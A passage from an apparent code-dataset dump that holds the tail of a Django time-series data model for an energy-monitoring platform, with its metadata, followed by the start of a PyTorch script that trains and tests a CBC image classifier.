If there are multiple extremes, only\n the earliest minimum and the earliest maximum will be included in\n the result.\n\n @postcondition: If the domain overlaps the given time interval, neither\n element in the returned tuple shall be None.\n\n @note: The term aggregates is in this context taken from the SQL\n terminology, where C{AVG}, C{MIN}, C{MAX} (and even C{COUNT}) are\n aggregates of a query result, not to be confused with the object\n oriented programming term spelled the same way. However, there is an\n important semantic difference between the SQL C{AVG} and the average\n returned by this method. In particular, the SQL C{AVG} does nothing to\n mimic the average of the underlying function, whereas the average\n included in the result of this method is the mean value of the curve\n defined by the linear interpolation between the points of this data\n series across the given interval. But also, the SQL C{MIN} and C{MAX}\n might be wrong, as interpolated values at the end-points of the\n interval should also be considered in case actual StoredData is not\n available at these timestamps.\n\n @note: This method is implemented strictly on top of\n L{get_samples()}, and so any valid override of\n L{get_samples()} should leave this C{aggregated_samples()}\n method in a working state.\n \"\"\"\n assert self.is_rate()\n consumption = None\n minimum = None\n maximum = None\n for current_sample, next_sample in \\\n pairwise_extended(itertools.ifilter(\n lambda s: not s.extrapolated,\n self.get_samples(from_timestamp, to_timestamp))):\n\n final_timestamp = current_sample.to_timestamp\n\n if minimum is None or \\\n current_sample.physical_quantity < \\\n minimum.physical_quantity:\n minimum = current_sample\n\n if maximum is None or \\\n current_sample.physical_quantity > \\\n maximum.physical_quantity:\n maximum = current_sample\n\n if self.is_piecewise_constant():\n # Area under horizontal line (piecewise constant)\n delta_consumption = (\n PhysicalQuantity(\n (current_sample.to_timestamp -\n current_sample.from_timestamp).\n total_seconds(), 'second') *\n current_sample.physical_quantity)\n else:\n if next_sample is None:\n break\n\n # Area under slope (interpolation of continuous)\n delta_consumption = (\n PhysicalQuantity(\n (next_sample.timestamp -\n current_sample.timestamp).\n total_seconds(), 'second') *\n (\n current_sample.physical_quantity +\n next_sample.physical_quantity) /\n PhysicalQuantity(2, 'none'))\n\n if consumption is not None:\n consumption += delta_consumption\n else:\n first_timestamp = current_sample.from_timestamp\n consumption = delta_consumption\n\n if minimum is not None and maximum is not None:\n if consumption is not None:\n average_value = consumption / PhysicalQuantity(\n (final_timestamp - first_timestamp).total_seconds(),\n 'second')\n average_sample = self.create_range_sample(\n first_timestamp, final_timestamp,\n average_value)\n else:\n average_sample = maximum\n else:\n # Nothing at all yielded from self.get_samples(), or\n # everything yielded was extrapolated. 
If there is a\n # non-zero-length overlap between requested period and domain, this\n # should not occur.\n minimum = None\n maximum = None\n average_sample = None\n\n return (average_sample, minimum, maximum)\n\n def create_point_sample(\n self, timestamp, physical_quantity,\n uncachable=False, extrapolated=False):\n \"\"\"\n Factory method for creating a L{PointSample} or L{PointSampleCurrency}\n depending on what will suit this C{DataSeries}.\n\n @param timestamp: The timestamp of the created sample.\n\n @param physical_quantity: The value of the created sample.\n\n @param uncachable: If C{True} the returned point sample will never be\n cached.\n\n @param extrapolated: If C{True} the returned point sample is marked as\n extrapolated.\n\n @return: A L{PointSample} or L{PointSampleCurrency} with unit and\n possibly currency set to C{self.unit} and C{self.currency}\n respectively.\n \"\"\"\n assert physical_quantity.compatible_unit(self.unit), \\\n '%s not compatible with %s' % (physical_quantity.units, self.unit)\n\n return Sample(\n timestamp, timestamp, physical_quantity,\n not uncachable, extrapolated)\n\n def create_range_sample(\n self, from_timestamp, to_timestamp, physical_quantity,\n uncachable=False, extrapolated=False):\n \"\"\"\n @param from_timestamp: The start-point of the range of the created\n sample.\n\n @param to_timestamp: The end-point of the range of the created sample.\n\n @param physical_quantity: The value of the created sample.\n\n @param uncachable: If C{True} the returned range sample will never be\n cached.\n\n @return: A L{RangeSample} or L{RangeSampleCurrency} with unit and\n possibly currency set to C{self.unit} and C{self.currency}\n respectively.\n \"\"\"\n assert physical_quantity.compatible_unit(self.unit), \\\n '%s not compatible with %s' % (physical_quantity.units, self.unit)\n\n return Sample(\n from_timestamp, to_timestamp, physical_quantity,\n not uncachable, extrapolated)\n\n def convert(self, value, target_unit):\n \"\"\"\n Convert C{value} to C{target_unit}, assuming the unit of C{value} is\n C{self.unit}.\n\n @precondition: C{PhysicalQuantity.compatible_units(target_unit,\n self.unit)} is C{True} or C{target_unit in ['celsius'] and\n PhysicalQuantity.compatible_units('kelvin', self.unit)}.\n \"\"\"\n quantity = PhysicalQuantity(value, self.unit)\n if target_unit == 'celsius':\n assert PhysicalQuantity.compatible_units('kelvin', self.unit)\n if self.role == DataRoleField.ABSOLUTE_TEMPERATURE:\n quantity -= PhysicalQuantity(Fraction(\"273.15\"), 'kelvin')\n else:\n assert self.role == DataRoleField.RELATIVE_TEMPERATURE\n return quantity.convert('kelvin')\n else:\n assert PhysicalQuantity.compatible_units(target_unit, self.unit)\n return quantity.convert(target_unit)\n\n def condense_accumulation(self, from_timestamp, to_timestamp, samples):\n return [\n self.create_range_sample(\n from_timestamp=from_timestamp,\n to_timestamp=to_timestamp,\n physical_quantity=sum(\n (sample.physical_quantity for sample in samples),\n PhysicalQuantity(0, self.unit)),\n uncachable=(\n (not samples) or\n from_timestamp != samples[0].from_timestamp or\n to_timestamp != samples[-1].to_timestamp or\n any((not sample.cachable for sample in samples))),\n extrapolated=any((sample.extrapolated for sample in samples)))]\n\n def condense_rate(self, samples):\n \"\"\"\n Condense rate by returning up to two samples that are local extremes\n (minimum and maximum) within the given C{samples}.\n\n If there are more than two such local extremes, it is not specified\n which valid 
pair of them will be returned, only that some\n valid pair will be returned.\n \"\"\"\n if samples:\n # The literal set serves to ensure that the same sample is not\n # yielded twice.\n return sorted(\n {\n min(samples, key=attrgetter('physical_quantity')),\n max(samples, key=attrgetter('physical_quantity'))},\n key=attrgetter('from_timestamp'))\n else:\n return []\n\n def get_preferred_unit_converter(self):\n \"\"\"\n Get preferred unit converter.\n\n @see: L{preferredunits.get_preferred_unit_converter}.\n\n @precondition: C{self.customer is not None}\n \"\"\"\n assert self.customer is not None or get_customer() is not None\n\n return get_preferred_unit_converter(\n self.role, utility_type=self.utility_type,\n customer=self.customer, unit=self.unit)\n\n def is_absolute_temperature(self):\n return self.role == DataRoleField.ABSOLUTE_TEMPERATURE\n\n\nclass StoredData(models.Model):\n \"\"\"\n C{StoredData} is a class for storing data belonging to a\n L{DataSeries}, or a specialization of such.\n\n @ivar data_series: The L{DataSeries} this C{StoredData} belongs to.\n\n @ivar value: The integer value held by this C{StoredData}. The unit of\n this value is found in C{data_series.unit}.\n\n @ivar timestamp: A timestamp that this C{StoredData} belongs to. If this\n C{StoredData} represents a L{PointSample}, the C{timestamp} obviously\n corresponds to L{PointSample.timestamp}. If this C{StoredData} represents a\n L{RangeSample}, the C{timestamp} corresponds to\n L{RangeSample.from_timestamp}, and the next C{StoredData} defines the\n L{RangeSample.to_timestamp}.\n \"\"\"\n data_series = models.ForeignKey(DataSeries, on_delete=models.CASCADE,\n related_name=\"stored_data\")\n value = models.BigIntegerField(_('value'))\n timestamp = models.DateTimeField(_('timestamp'))\n\n class Meta:\n verbose_name = _('stored data')\n verbose_name_plural = _('stored data')\n unique_together = (\"data_series\", \"timestamp\")\n index_together = [\n ['data_series', 'timestamp'],\n ]\n ordering = [\"timestamp\"]\n app_label = 'measurementpoints'\n\n def __unicode__(self):\n return u\"%s, %s\" % (self.timestamp, self.value)\n", "sub_path": "legacy/measurementpoints/models/dataseries.py", "file_name": "dataseries.py", "file_ext": "py", "file_size_in_byte": 59640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gridplatform.trackuser.managers.FilteringQuerySetMixinBase", "line_number": 76, "usage_type": "name"}, {"api_name": "gridplatform.trackuser.get_user", "line_number": 83, "usage_type": "call"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 89, "usage_type": "call"}, {"api_name": "fields.DataRoleField.ELECTRICITY_TARIFF", "line_number": 91, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 91, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2_QUOTIENT", "line_number": 92, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 92, "usage_type": "name"}, {"api_name": "django.db.models.query_utils.Q", "line_number": 100, "usage_type": "call"}, {"api_name": "gridplatform.trackuser.get_provider_id", "line_number": 105, "usage_type": "call"}, {"api_name": "django.db.models.query_utils.Q", "line_number": 109, "usage_type": "call"}, {"api_name": "gridplatform.encryption.managers.DecryptingManager", "line_number": 120, "usage_type": "name"}, {"api_name": "gridplatform.utils.models.StoredSubclassManager", "line_number": 120, "usage_type": "name"}, 
{"api_name": "gridplatform.encryption.managers.DecryptingQuerySet", "line_number": 124, "usage_type": "name"}, {"api_name": "django.db.models.query.ValuesQuerySet", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.query.ValuesListQuerySet", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.query.DateQuerySet", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.query.DateTimeQuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 152, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 152, "usage_type": "name"}, {"api_name": "gridplatform.utils.models.StoreSubclass", "line_number": 159, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 221, "usage_type": "call"}, {"api_name": "gridplatform.customers.models.Customer", "line_number": 221, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 221, "usage_type": "name"}, {"api_name": "django.db.models.PROTECT", "line_number": 221, "usage_type": "attribute"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 222, "usage_type": "name"}, {"api_name": "fields.DataRoleField", "line_number": 223, "usage_type": "call"}, {"api_name": "django.db.models.ForeignKey", "line_number": 225, "usage_type": "call"}, {"api_name": "graph.Graph", "line_number": 225, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 225, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.fields.BuckinghamField", "line_number": 228, "usage_type": "call"}, {"api_name": "django.db.models.IntegerField", "line_number": 230, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 230, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 231, "usage_type": "call"}, {"api_name": "gridplatform.utils.utilitytypes.OPTIONAL_METER_CHOICES", "line_number": 231, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.utilitytypes", "line_number": 231, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 241, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 243, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 245, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 247, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 249, "usage_type": "call"}, {"api_name": "gridplatform.utils.models.StoreSubclass.Meta", "line_number": 252, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.models.StoreSubclass", "line_number": 252, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 253, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 254, "usage_type": "call"}, {"api_name": "gridplatform.customers.models.Customer", "line_number": 276, "usage_type": "name"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 315, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 389, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 447, "usage_type": "call"}, {"api_name": 
"gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 458, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 467, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 520, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 520, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 524, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 524, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 527, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 527, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.RESOLUTIONS", "line_number": 530, "usage_type": "attribute"}, {"api_name": "gridplatform.utils.condense", "line_number": 530, "usage_type": "name"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 548, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 579, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 587, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 742, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 742, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 744, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 744, "usage_type": "name"}, {"api_name": "gridplatform.utils.condense.floor", "line_number": 764, "usage_type": "call"}, {"api_name": "gridplatform.utils.condense", "line_number": 764, "usage_type": "name"}, {"api_name": "itertools.groupby", "line_number": 767, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise", "line_number": 788, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.count_extended", "line_number": 789, "usage_type": "call"}, {"api_name": "itertools.takewhile", "line_number": 796, "usage_type": "call"}, {"api_name": "itertools.dropwhile", "line_number": 802, "usage_type": "call"}, {"api_name": "fields.DataRoleField.CONSUMPTION", "line_number": 807, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 807, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2", "line_number": 808, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 808, "usage_type": "name"}, {"api_name": "fields.DataRoleField.COST", "line_number": 809, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 809, "usage_type": "name"}, {"api_name": "fields.DataRoleField.MASS", "line_number": 810, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 810, "usage_type": "name"}, {"api_name": "fields.DataRoleField.TIME", "line_number": 811, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 811, "usage_type": "name"}, {"api_name": "fields.DataRoleField.STANDARD_HEATING_DEGREE_DAYS", "line_number": 812, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 812, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEATING_DEGREE_DAYS", "line_number": 813, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 813, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEATING_DEGREE_DAYS_CORRECTED_CONSUMPTION", "line_number": 814, 
"usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 814, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLUME", "line_number": 815, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 815, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ENERGY_DRIVER", "line_number": 816, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 816, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRODUCTION", "line_number": 817, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 817, "usage_type": "name"}, {"api_name": "fields.DataRoleField.REACTIVE_ENERGY", "line_number": 818, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 818, "usage_type": "name"}, {"api_name": "fields.DataRoleField.STATE", "line_number": 827, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 827, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEAT_TARIFF", "line_number": 828, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 828, "usage_type": "name"}, {"api_name": "fields.DataRoleField.GAS_TARIFF", "line_number": 829, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 829, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ELECTRICITY_TARIFF", "line_number": 830, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 830, "usage_type": "name"}, {"api_name": "fields.DataRoleField.WATER_TARIFF", "line_number": 831, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 831, "usage_type": "name"}, {"api_name": "fields.DataRoleField.OIL_TARIFF", "line_number": 832, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 832, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CO2_QUOTIENT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 833, "usage_type": "name"}, {"api_name": "fields.DataRoleField.EMPLOYEES", "line_number": 834, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 834, "usage_type": "name"}, {"api_name": "fields.DataRoleField.AREA", "line_number": 835, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 835, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_ELECTRICITY_TARIFF", "line_number": 836, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 836, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_GAS_TARIFF", "line_number": 837, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 837, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_HEAT_TARIFF", "line_number": 838, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 838, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_WATER_TARIFF", "line_number": 839, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 839, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_OIL_TARIFF", "line_number": 840, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 840, "usage_type": "name"}, {"api_name": "fields.DataRoleField.POWER", "line_number": 844, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 844, "usage_type": "name"}, {"api_name": "fields.DataRoleField.REACTIVE_POWER", 
"line_number": 845, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 845, "usage_type": "name"}, {"api_name": "fields.DataRoleField.POWER_FACTOR", "line_number": 846, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 846, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 847, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 847, "usage_type": "name"}, {"api_name": "fields.DataRoleField.RELATIVE_TEMPERATURE", "line_number": 848, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 848, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLUME_FLOW", "line_number": 849, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 849, "usage_type": "name"}, {"api_name": "fields.DataRoleField.VOLTAGE", "line_number": 850, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 850, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CURRENT", "line_number": 851, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 851, "usage_type": "name"}, {"api_name": "fields.DataRoleField.FREQUENCY", "line_number": 852, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 852, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRESSURE", "line_number": 853, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 853, "usage_type": "name"}, {"api_name": "fields.DataRoleField.LINEAR_REGRESSION", "line_number": 854, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 854, "usage_type": "name"}, {"api_name": "fields.DataRoleField.EFFICIENCY", "line_number": 855, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 855, "usage_type": "name"}, {"api_name": "fields.DataRoleField.MEAN_COOLDOWN_TEMPERATURE", "line_number": 861, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 861, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CONSUMPTION_UTILIZATION_EMPLOYEES", "line_number": 862, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 862, "usage_type": "name"}, {"api_name": "fields.DataRoleField.CONSUMPTION_UTILIZATION_AREA", "line_number": 863, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 863, "usage_type": "name"}, {"api_name": "fields.DataRoleField.PRODUCTION_ENPI", "line_number": 864, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 864, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HEAT_LOSS_COEFFICIENT", "line_number": 865, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 865, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_ELECTRICITY_TARIFF", "line_number": 869, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 869, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_GAS_TARIFF", "line_number": 870, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 870, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_HEAT_TARIFF", "line_number": 871, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 871, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_WATER_TARIFF", "line_number": 872, "usage_type": "attribute"}, {"api_name": 
"fields.DataRoleField", "line_number": 872, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN_OIL_TARIFF", "line_number": 873, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 873, "usage_type": "name"}, {"api_name": "fields.DataRoleField.HIDDEN", "line_number": 874, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 874, "usage_type": "name"}, {"api_name": "fields.DataRoleField.TARIFFS", "line_number": 954, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 954, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 990, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 991, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 998, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 999, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1009, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1013, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1023, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1027, "usage_type": "argument"}, {"api_name": "fractions.Fraction", "line_number": 1039, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 1041, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1075, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1079, "usage_type": "argument"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1085, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1094, "usage_type": "call"}, {"api_name": "gridplatform.utils.iter_ext.pairwise_extended", "line_number": 1216, "usage_type": "call"}, {"api_name": "itertools.ifilter", "line_number": 1216, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1235, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1246, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1253, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1263, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1306, "usage_type": "call"}, {"api_name": "gridplatform.utils.samples.Sample", "line_number": 1331, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1344, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity.compatible_units", "line_number": 1346, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1346, "usage_type": "name"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 1347, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1347, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1348, "usage_type": "call"}, {"api_name": "fractions.Fraction", "line_number": 1348, "usage_type": 
"call"}, {"api_name": "fields.DataRoleField.RELATIVE_TEMPERATURE", "line_number": 1350, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1350, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity.compatible_units", "line_number": 1353, "usage_type": "call"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1353, "usage_type": "name"}, {"api_name": "gridplatform.utils.unitconversion.PhysicalQuantity", "line_number": 1363, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1385, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1386, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 1387, "usage_type": "call"}, {"api_name": "gridplatform.trackuser.get_customer", "line_number": 1399, "usage_type": "call"}, {"api_name": "legacy.legacy_utils.preferredunits.get_preferred_unit_converter", "line_number": 1401, "usage_type": "call"}, {"api_name": "fields.DataRoleField.ABSOLUTE_TEMPERATURE", "line_number": 1406, "usage_type": "attribute"}, {"api_name": "fields.DataRoleField", "line_number": 1406, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 1409, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 1409, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 1426, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1426, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 1426, "usage_type": "attribute"}, {"api_name": "django.db.models.BigIntegerField", "line_number": 1428, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1428, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1428, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 1429, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1429, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1432, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 1433, "usage_type": "call"}]} +{"seq_id": "500260711", "text": "import argparse\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\n\nfrom torch_cbc.cbc_model import CBCModel\nfrom torch_cbc.losses import MarginLoss\nfrom torch_cbc.layers import ConstrainedConv2d\n\nfrom utils import visualize_components\n\n\nclass Backbone(nn.Module):\n def __init__(self, activation=nn.Hardswish()):\n super(Backbone, self).__init__()\n self.conv2d = ConstrainedConv2d\n self.activation = activation\n\n self.conv1 = self.conv2d(1, 32, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv1.weight)\n torch.nn.init.zeros_(self.conv1.bias)\n self.conv2 = self.conv2d(32, 64, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv2.weight)\n torch.nn.init.zeros_(self.conv2.bias)\n self.conv3 = self.conv2d(64, 64, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv3.weight)\n torch.nn.init.zeros_(self.conv3.bias)\n self.conv4 = self.conv2d(64, 128, 3, 1)\n torch.nn.init.xavier_uniform_(self.conv4.weight)\n torch.nn.init.zeros_(self.conv4.bias)\n self.maxpool2d = nn.MaxPool2d(2)\n\n def forward(self, x):\n x = self.activation(self.conv2(self.activation(self.conv1(x))))\n x = self.maxpool2d(x)\n x = 
self.activation(self.conv4(self.activation(self.conv3(x))))\n x = self.maxpool2d(x)\n return x\n\n\ndef train(args, model, device, train_loader, optimizer, lossfunction, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n\n onehot = torch.zeros(len(target), 10, device=device) \\\n .scatter_(1, target.unsqueeze(1), 1.) # 10 classes\n loss = lossfunction(output, onehot).mean()\n loss.backward()\n optimizer.step()\n\n for name, p in model.named_parameters():\n if ('components' in name) or ('reasoning' in name):\n p.data.clamp_(0, 1)\n\n if batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\n\ndef test(args, model, device, test_loader, lossfunction):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n onehot = torch.zeros(len(target), 10, device=device) \\\n .scatter_(1, target.unsqueeze(1), 1.) # 10 classes\n test_loss += lossfunction(output, onehot).sum().item() # sum up batch loss # noqa\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability # noqa\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} 